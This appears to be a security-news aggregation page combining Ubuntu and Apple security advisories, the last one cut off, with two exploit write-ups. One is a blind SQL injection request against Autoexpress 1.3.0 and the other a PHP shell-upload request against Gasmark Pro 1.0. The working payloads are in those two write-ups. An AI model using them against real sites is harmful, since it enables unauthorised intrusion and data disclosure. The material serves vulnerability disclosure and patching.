Tramyardg Autoexpress version 1.3.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: tramyardg autoexpress - SQL Injection# Google Dork: N/A# Date: 11/28/2023# Exploit Author: Scott White# Vendor Homepage: https://github.com/tramyardg/autoexpress# Version: v1.3.0# Tested on: Ubuntu 22.04.3 LTS + Apache/2.4.52# CVE : CVE-2023-48901# References:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48901https://www.cve.org/CVERecord?id=CVE-2023-48901# Description:Autoexpress 1.3.0 allows SQL Injection via parameter 'carId' in /autoexpress/details.php and /autoexpress/admin/inventory.php. This vulnerability allows remote attackers to disclose sensitive information on affected installations.# Proof of Concept:+ Go to "http://localhost/autoexpress/admin/sign-in.php"+ Sign in with Admin credentials+ Click "Manage Inventory" --> "Actions" --> "Manage Photos" while having the "Intercept On" Burp Suite+ Should receive a request of POST - /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=[ID]+ Send it to Repeater+ Captured Burp Request:POST /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=3 HTTP/1.1Host: localhostContent-Length: 0Accept: application/json, text/javascript, */*; q=0.01User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36X-Requested-With: XMLHttpRequestOrigin: http://localhostReferer: http://localhost/autoexpress/admin/inventory.php?username=adminAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=PHPSESSIONIDConnection: close# Sample RequestPOST /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=3+and+(ascii(substring((select+version()),1,1)))+%3d+56 HTTP/1.1Host: localhostContent-Length: 0Accept: application/json, text/javascript, */*; q=0.01User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36X-Requested-With: XMLHttpRequestOrigin: http://localhostReferer: http://localhost/autoexpress/admin/inventory.php?username=adminAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=PHPSESSIONIDConnection: close

Tramyardg Autoexpress 1.3.0 SQL Injection

Ubuntu Security Notice 6700-1 - It was discovered that the Layer 2 Tunneling Protocol implementation in the Linux kernel contained a race condition when releasing PPPoL2TP sockets in certain conditions, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the ext4 file system implementation in the Linux kernel did not properly handle block device modification while it is mounted. A privileged attacker could use this to cause a denial of service or possibly expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6700-1  
March 18, 2024

linux, linux-aws, linux-kvm, linux-lts-xenial vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux: Linux kernel  
- linux-kvm: Linux kernel for cloud environments  
- linux-aws: Linux kernel for Amazon Web Services (AWS) systems  
- linux-lts-xenial: Linux hardware enablement kernel from Xenial for Trusty

Details:

It was discovered that the Layer 2 Tunneling Protocol (L2TP) implementation  
in the Linux kernel contained a race condition when releasing PPPoL2TP  
sockets in certain conditions, leading to a use-after-free vulnerability.  
A local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2022-20567)

It was discovered that the ext4 file system implementation in the Linux  
kernel did not properly handle block device modification while it is  
mounted. A privileged attacker could use this to cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-34256)

Eric Dumazet discovered that the netfilter subsystem in the Linux kernel  
did not properly handle DCCP conntrack buffers in certain situations,  
leading to an out-of-bounds read vulnerability. An attacker could possibly  
use this to expose sensitive information (kernel memory). (CVE-2023-39197)

It was discovered that a race condition existed in the AppleTalk networking  
subsystem of the Linux kernel, leading to a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2023-51781)

It was discovered that the ext4 file system implementation in the Linux  
kernel did not properly handle the remount operation in certain cases,  
leading to a use-after-free vulnerability. A local attacker could use this  
to cause a denial of service (system crash) or possibly expose sensitive  
information. (CVE-2024-0775)

Notselwyn discovered that the netfilter subsystem in the Linux kernel did  
not properly handle verdict parameters in certain cases, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2024-1086)

It was discovered that a race condition existed in the SCSI Emulex  
LightPulse Fibre Channel driver in the Linux kernel when unregistering FCF  
and re-scanning an HBA FCF table, leading to a null pointer dereference  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2024-24855)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   linux-image-4.4.0-1130-kvm      4.4.0-1130.140  
   linux-image-4.4.0-252-generic   4.4.0-252.286  
   linux-image-4.4.0-252-lowlatency  4.4.0-252.286  
   linux-image-generic             4.4.0.252.258  
   linux-image-generic-lts-xenial  4.4.0.252.258  
   linux-image-kvm                 4.4.0.1130.127  
   linux-image-lowlatency          4.4.0.252.258  
   linux-image-lowlatency-lts-xenial  4.4.0.252.258  
   linux-image-virtual             4.4.0.252.258  
   linux-image-virtual-lts-xenial  4.4.0.252.258

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   linux-image-4.4.0-1129-aws      4.4.0-1129.135  
   linux-image-4.4.0-252-generic   4.4.0-252.286~14.04.1  
   linux-image-4.4.0-252-lowlatency  4.4.0-252.286~14.04.1  
   linux-image-aws                 4.4.0.1129.126  
   linux-image-generic-lts-xenial  4.4.0.252.219  
   linux-image-lowlatency-lts-xenial  4.4.0.252.219  
   linux-image-virtual-lts-xenial  4.4.0.252.219

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6700-1  
   CVE-2022-20567, CVE-2023-34256, CVE-2023-39197, CVE-2023-51781,  
   CVE-2024-0775, CVE-2024-1086, CVE-2024-24855

Ubuntu Security Notice USN-6700-1

Gasmark Pro version 1.0 suffers from a remote shell upload vulnerability.

    ## Title: GASMARK PRO-1.0 File Upload RCE## Author: nu11secur1ty## Date: 03/17/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html## Reference: https://portswigger.net/web-security/file-upload## Reference: https://www.cloudflare.com/learning/security/what-is-remote-code-execution/## Description:Vulnerable input:`<input type="file" class="form-control" id="productImage"name="productImage" style="width:auto;">`This application suffers from shell upload and remote code executionvulnerability, the attacker easilycan destroy this system, when he has credentials.STATUS: HIGH- Vulnerability CRITICAL[+]Exploit:```PHPPOST /gasmark/gasmark/php_action/createclient.php HTTP/1.1Host: pwnedhost.comCookie: PHPSESSID=1afinf22p9snl2nai24g29duucContent-Length: 1063Cache-Control: max-age=0Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://pwnedhost.comContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryb4PfTJ8hUNsEjxtBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://pwnedhost.com/gasmark/gasmark/add_client.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, iConnection: close------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="currnt_date"------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="name"pwned------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="gender"Female------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="mob_no"1234------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="reffering"1234------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="address"1234------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="productImage"; filename="1nsi1deyou.php"Content-Type: application/octet-stream<?php// by nu11secur1ty - 2023$fh = fopen('test.html', 'a');fwrite($fh, '<h1>Hello, you are hacked by Fileupload and RCE!</h1>');fclose($fh);//nlink('test.html');?>------WebKitFormBoundaryb4PfTJ8hUNsEjxtBContent-Disposition: form-data; name="create"------WebKitFormBoundaryb4PfTJ8hUNsEjxtB--```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/gasmark-pro-10-file-upload-rce.html)## Time spent:00:25:00

Gasmark Pro 1.0 Shell Upload

Apple Security Advisory 03-12-2024-1 - GarageBand 10.4.11 addresses code execution and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-12-2024-1 GarageBand 10.4.11

GarageBand 10.4.11 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT214090.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

GarageBand  
Available for: macOS Ventura and macOS Sonoma  
Impact: Processing a maliciously crafted file may lead to unexpected app  
termination or arbitrary code execution  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2024-23300: Marc Schoenefeld, Dr. rer. nat.

GarageBand 10.4.11 may be obtained from the App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmXw5dYACgkQX+5d1TXa  
IvpFLw/9ExaKuCx71r7iHpq/1M5z8aHNZNl3mZPP/NoVQIs8/ERz/n0fBRRljSZg  
8LnRH2lsRBKZtxN9CVEu5H5W8xAHa6DMdvMozjvwRbWFh0xDlLtgXbpuv9GGTGcB  
tmu9uQxpebG+s5MTfng2gZ1bSQ8G8dvEicHmLOsjIps8cI89uOiciXnFKb7GEOgD  
CO6quhznWETyzRZwAQtGQiD9jI7xgrlZLIGYb/dKg+WAvJrPvXvhZPLNdWCTwikp  
RD7xf2lzfu8S+o00FrjFQ1r5Xdt/GW8VUiT+r8cb65+v9HESzJUs2hoCXxQtzKYD  
SSAzbbAG9/n4Ku92jGItiGRk0M/wjJSvwWoBlUh3LTjA3XM75+vohl2PCGOoan+r  
TDTDf9PbAnSP4ysWM8/uXphebzLDww2c0pDaHRx6ZhAwi3BsHForVXJyD3DVWC92  
kw9PoYR3vcaJzAvDlWmrNTzrRRIU7SDT053fwst92zltirXjJB8lGYmtZTxWTbfS  
r6zCafVaxDhnuiDOdfnLSo0h5KBI1NXqG4H2mwI4f0ddP3Xn+m3XnF/apX3CXLZz  
58ulakxmg8Xsil0oV/1k46aQnEXjy2bwyt8CdUxOgcamd/haakOh0xsAnKltNbPi  
LUtwvFj6mbYV8u7PHgQSvK4O8Mmdm5BS48TNXZT6WR8Xz06DHp0=  
=JCnR  
-----END PGP SIGNATURE-----

Apple Security Advisory 03-12-2024-1

Apple Security Advisory 03-07-2024-7 - visionOS 1.1 addresses buffer overflow, bypass, code execution, and out of bounds read vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-07-2024-7 visionOS 1.1

visionOS 1.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214087.

Apple maintains a Security Releases page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Accessibility  
Available for: Apple Vision Pro  
Impact: An app may be able to spoof system notifications and UI  
Description: This issue was addressed with additional entitlement  
checks.  
CVE-2024-23262: Guilherme Rambo of Best Buddy Apps (rambo.codes)

ImageIO  
Available for: Apple Vision Pro  
Impact: Processing an image may result in disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23257: Junsung Lee working with Trend Micro Zero Day Initiative

ImageIO  
Available for: Apple Vision Pro  
Impact: Processing an image may lead to arbitrary code execution  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2024-23258: Zhenjiang Zhao of pangu team and Qianxin

ImageIO  
Available for: Apple Vision Pro  
Impact: Processing an image may lead to arbitrary code execution  
Description: A buffer overflow issue was addressed with improved memory  
handling.  
CVE-2024-23286: Dohyun Lee (@l33d0hyun)

Kernel  
Available for: Apple Vision Pro  
Impact: An app may be able to access user-sensitive data  
Description: A race condition was addressed with additional validation.  
CVE-2024-23235

Kernel  
Available for: Apple Vision Pro  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: A memory corruption vulnerability was addressed with  
improved locking.  
CVE-2024-23265: Xinru Chi of Pangu Lab

Kernel  
Available for: Apple Vision Pro  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23225

Metal  
Available for: Apple Vision Pro  
Impact: An application may be able to read restricted memory  
Description: A validation issue was addressed with improved input  
sanitization.  
CVE-2024-23264: Meysam Firouzi @R00tkitsmm working with Trend Micro Zero  
Day Initiative

Persona  
Available for: Apple Vision Pro  
Impact: An unauthenticated user may be able to use an unprotected  
Persona  
Description: A permissions issue was addressed to help ensure Personas  
are always protected  
CVE-2024-23295: Patrick Reardon

RTKit  
Available for: Apple Vision Pro  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23296

Safari  
Available for: Apple Vision Pro  
Impact: An app may be able to fingerprint the user  
Description: The issue was addressed with improved handling of caches.  
CVE-2024-23220

UIKit  
Available for: Apple Vision Pro  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-23246: Deutsche Telekom Security GmbH sponsored by Bundesamt  
für Sicherheit in der Informationstechnik

WebKit  
Available for: Apple Vision Pro  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 259694  
CVE-2024-23226: Pwn2car

WebKit  
Available for: Apple Vision Pro  
Impact: A malicious website may exfiltrate audio data cross-origin  
Description: The issue was addressed with improved UI handling.  
WebKit Bugzilla: 263795  
CVE-2024-23254: James Lee (@Windowsrcer)

WebKit  
Available for: Apple Vision Pro  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: A logic issue was addressed with improved validation.  
WebKit Bugzilla: 264811  
CVE-2024-23263: Johan Carlsson (joaxcar)

WebKit  
Available for: Apple Vision Pro  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: A logic issue was addressed with improved state management.  
WebKit Bugzilla: 267241  
CVE-2024-23284: Georg Felber and Marco Squarcina

Additional recognition

Kernel  
We would like to acknowledge Tarek Joumaa (@tjkr0wn) and 이준성(Junsung  
Lee) for their assistance.

Model I/O  
We would like to acknowledge Junsung Lee for their assistance.

Power Management  
We would like to acknowledge Pan ZhenPeng (@Peterpan0927) of STAR Labs  
SG Pte. Ltd. for their assistance.

Safari  
We would like to acknowledge Abhinav Saraswat, Matthew C, and 이동하 ( Lee  
Dong Ha of ZeroPointer Lab ) for their assistance.

WebKit  
We would like to acknowledge Valentino Dalla Valle, Pedro Bernardo,  
Marco Squarcina, and Lorenzo Veronese of TU Wien for their assistance.

Instructions on how to update visionOS are available at  
https://support.apple.com/kb/HT214009  To check the software version  
on your Apple Vision Pro, open the Settings app and choose General >  
About.  
All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmXqch0ACgkQX+5d1TXa  
Ivp/nA//XUiuB8BB/bRbBd0c9z/0DScN1cEWhZaAiWh7HGiOji+HjUv3GocXDHTh  
65MqZ3y4C08Qr5qDNzZOnaTUZgbk+h3Pz62SoSS0deI3xp1uNpHsmtSqMh6Qs30I  
/IMBpmBuyqoL6w9KBSAubqsrwT/SVQuz67yMCSNUQ27KL3Dymf1JFKf+oaKYTC5R  
TRrmZ1yzWkvziGYYsjUR+G+HiwnQza/39sFOu7Eezkv+lqtQcP1v2eFRporxqvDX  
QejHf4mUIqNZs9KSe7z2uguRlMTbAaaOFt0UCXHhXXifQK9fmrOP9vKofAiy7S54  
NDuSa6gZzKvakC0VxUozGZaFhVocDDbWOBrH6eLI3RTR59sl5RXv4cFTZXp5Xfy4  
4xj99QM/zXb75TnPTWPlCJ9E2CfmFtfTRDa7wgZgeRL2dfHihaCV7/p28m8vdOAS  
QDbOBlReS27zwOcxVUSo+LcPvymve7ObCUc+ITwHW7V3Uq92mKfYmbv99ovxQGNB  
9LAChqBoYfWTbUAfP9/cvY++543CAE5xmzSIfnmFEH04ZA2Fh4Gc6mmo1W3Q24Hx  
QwhV1agy52x2t4g+BABQSNkwLDkS9yGj/SNqz1fknVyFoKry0tZAdXGM51PwQvV1  
7BnKw3PgU0EZK135spUgfhRBbemWfoISY9t/QqA2RCp9hiEsXZA=  
=pp0o  
-----END PGP SIGNATURE-----

Apple Security Advisory 03-07-2024-7

Apple Security Advisory 03-07-2024-6 - tvOS 17.4 addresses buffer overflow, bypass, and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-07-2024-6 tvOS 17.4

tvOS 17.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214086.

Apple maintains a Security Releases page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Accessibility  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A malicious app may be able to observe user data in log entries  
related to accessibility notifications  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-23291

AppleMobileFileIntegrity  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to elevate privileges  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-23288: Wojciech Regula of SecuRing (wojciechregula.blog) and  
Kirin (@Pwnrin)

CoreBluetooth - LE  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access Bluetooth-connected microphones  
without user permission  
Description: An access issue was addressed with improved access  
restrictions.  
CVE-2024-23250: Guilherme Rambo of Best Buddy Apps (rambo.codes)

file  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing a file may lead to a denial-of-service or potentially  
disclose memory contents  
Description: This issue was addressed with improved checks.  
CVE-2022-48554

Image Processing  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23270: an anonymous researcher

ImageIO  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing an image may lead to arbitrary code execution  
Description: A buffer overflow issue was addressed with improved memory  
handling.  
CVE-2024-23286: Dohyun Lee (@l33d0hyun)

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access user-sensitive data  
Description: A race condition was addressed with additional validation.  
CVE-2024-23235

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: A memory corruption vulnerability was addressed with  
improved locking.  
CVE-2024-23265: Xinru Chi of Pangu Lab

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23225

libxpc  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to break out of its sandbox  
Description: The issue was addressed with improved checks.  
CVE-2024-23278: an anonymous researcher

libxpc  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code out of its sandbox  
or with certain elevated privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-0258: ali yabuz

MediaRemote  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A malicious application may be able to access private  
information  
Description: The issue was addressed with improved checks.  
CVE-2024-23297: scj643

Metal  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An application may be able to read restricted memory  
Description: A validation issue was addressed with improved input  
sanitization.  
CVE-2024-23264: Meysam Firouzi @R00tkitsmm working with Trend Micro Zero  
Day Initiative

RTKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23296

Sandbox  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to leak sensitive user information  
Description: A race condition was addressed with improved state  
handling.  
CVE-2024-23239: Mickey Jin (@patch1t)

Sandbox  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access user-sensitive data  
Description: A logic issue was addressed with improved restrictions.  
CVE-2024-23290: Wojciech Regula of SecuRing (wojciechregula.blog)

Siri  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker with physical access may be able to use Siri to  
access sensitive user data  
Description: This issue was addressed through improved state management.  
CVE-2024-23293: Bistrit Dahal

Spotlight  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to leak sensitive user information  
Description: This issue was addressed through improved state management.  
CVE-2024-23241

UIKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-23246: Deutsche Telekom Security GmbH sponsored by Bundesamt  
für Sicherheit in der Informationstechnik

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 259694  
CVE-2024-23226: Pwn2car

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A malicious website may exfiltrate audio data cross-origin  
Description: The issue was addressed with improved UI handling.  
WebKit Bugzilla: 263795  
CVE-2024-23254: James Lee (@Windowsrcer)

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: A logic issue was addressed with improved validation.  
WebKit Bugzilla: 264811  
CVE-2024-23263: Johan Carlsson (joaxcar)

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A maliciously crafted webpage may be able to fingerprint the  
user  
Description: An injection issue was addressed with improved validation.  
WebKit Bugzilla: 266703  
CVE-2024-23280: an anonymous researcher

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: A logic issue was addressed with improved state management.  
WebKit Bugzilla: 267241  
CVE-2024-23284: Georg Felber and Marco Squarcina

Additional recognition

CoreAnimation  
We would like to acknowledge Junsung Lee for their assistance.

CoreMotion  
We would like to acknowledge Eric Dorphy of Twin Cities App Dev LLC for  
their assistance.

Kernel  
We would like to acknowledge Tarek Joumaa (@tjkr0wn) for their  
assistance.

libxml2  
We would like to acknowledge OSS-Fuzz, Ned Williamson of Google Project  
Zero for their assistance.

libxpc  
We would like to acknowledge Rasmus Sten, F-Secure (Mastodon:  
@pajp@blog.dll.nu), and an anonymous researcher for their assistance.

Photos  
We would like to acknowledge Abhay Kailasia (@abhay_kailasia) of Lakshmi  
Narain College Of Technology Bhopal for their assistance.

Power Management  
We would like to acknowledge Pan ZhenPeng (@Peterpan0927) of STAR Labs  
SG Pte. Ltd. for their assistance.

Sandbox  
We would like to acknowledge Zhongquan Li (@Guluisacat) for their  
assistance.

Siri  
We would like to acknowledge Bistrit Dahal for their assistance.

Software Update  
We would like to acknowledge Bin Zhang of Dublin City University for  
their assistance.

WebKit  
We would like to acknowledge Nan Wang (@eternalsakura13) of 360  
Vulnerability Research Institute, Valentino Dalla Valle, Pedro Bernardo,  
Marco Squarcina, and Lorenzo Veronese of TU Wien for their assistance.

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting "Settings ->  
System -> Software Update -> Update Software."  To check the current  
version of software, select "Settings -> General -> About."  
All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmXqcgcACgkQX+5d1TXa  
IvrIdQ/9HRpg5/rTwCLemvmrsOZ3yt/cvAd9UD9uy9BFVL3yQfAStC1GBdCIZlc7  
5DUtJVCGMDb77PDK64P74Z2METMrvy5jeSCkAlCHv1FYe4F4LC8j01Dj9CEms6uI  
QAfvzSMrbVaBlXJte/x1IeI+zXwtZS4XgvpYH3kjoZbeGspxOM5z3vKRvuk0WNC9  
7FHJ43HFecsHF6mBe7Nr/8iwMxtsNwWKknaT4wywXE8hEde1OaSVya370H38SS+n  
GuSG2ivIDN8hGVvL8pCqqVqzAtNq5BzVSQ4aQ1+4MDB8QWLP/FGnjYi83qS6hDO0  
AE5TGvMOKfxqKwg4eh4ohtSvsHzXrEVG5yQgvVpz4yd4JxRizSGBloDhyDLlXL+l  
1PnuFaPFx+b6EkvafIdzo4b1O2Y6CnDy0iFrXdU3pbWG/QImxL6Krg6NtXcHGFWD  
h7iNnhJ14elhKEwTuoI0c9QlRTwRyCKSdrM8AEravz8VaoHGXJlb1SPtLUAejwH4  
kOoAT+zAb4EOELUWtgSk4d+tQeBKhD6sgOPkn6olGi5X0HJTHxiMqFCMbfNDk8Ko  
gTuMdmCOLYRbTSqoaJWW2gv9hLYoYBul9tKRgrQT6WdfKbH5WiCvZ9v7z1N4Ur8+  
l7syGGcrIX/eC2lZWGfaw49fLobn8PGvaM6cxazDhEYl9BRGlpc=  
=AI8u  
-----END PGP SIGNATURE-----

Apple Security Advisory 03-07-2024-6

Apple Security Advisory 03-07-2024-5 - watchOS 10.4 addresses buffer overflow, bypass, and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-07-2024-5 watchOS 10.4

watchOS 10.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214088.

Apple maintains a Security Releases page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Accessibility  
Available for: Apple Watch Series 4 and later  
Impact: A malicious app may be able to observe user data in log entries  
related to accessibility notifications  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-23291

AppleMobileFileIntegrity  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to elevate privileges  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-23288: Wojciech Regula of SecuRing (wojciechregula.blog) and  
Kirin (@Pwnrin)

CoreBluetooth - LE  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access Bluetooth-connected microphones  
without user permission  
Description: An access issue was addressed with improved access  
restrictions.  
CVE-2024-23250: Guilherme Rambo of Best Buddy Apps (rambo.codes)

file  
Available for: Apple Watch Series 4 and later  
Impact: Processing a file may lead to a denial-of-service or potentially  
disclose memory contents  
Description: This issue was addressed with improved checks.  
CVE-2022-48554

ImageIO  
Available for: Apple Watch Series 4 and later  
Impact: Processing an image may lead to arbitrary code execution  
Description: A buffer overflow issue was addressed with improved memory  
handling.  
CVE-2024-23286: Dohyun Lee (@l33d0hyun)

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: A race condition was addressed with additional validation.  
CVE-2024-23235

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: A memory corruption vulnerability was addressed with  
improved locking.  
CVE-2024-23265: Xinru Chi of Pangu Lab

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23225

libxpc  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to break out of its sandbox  
Description: The issue was addressed with improved checks.  
CVE-2024-23278: an anonymous researcher

libxpc  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code out of its sandbox  
or with certain elevated privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-0258: ali yabuz

MediaRemote  
Available for: Apple Watch Series 4 and later  
Impact: A malicious application may be able to access private  
information  
Description: The issue was addressed with improved checks.  
CVE-2024-23297: scj643

Messages  
Available for: Apple Watch Series 4 and later  
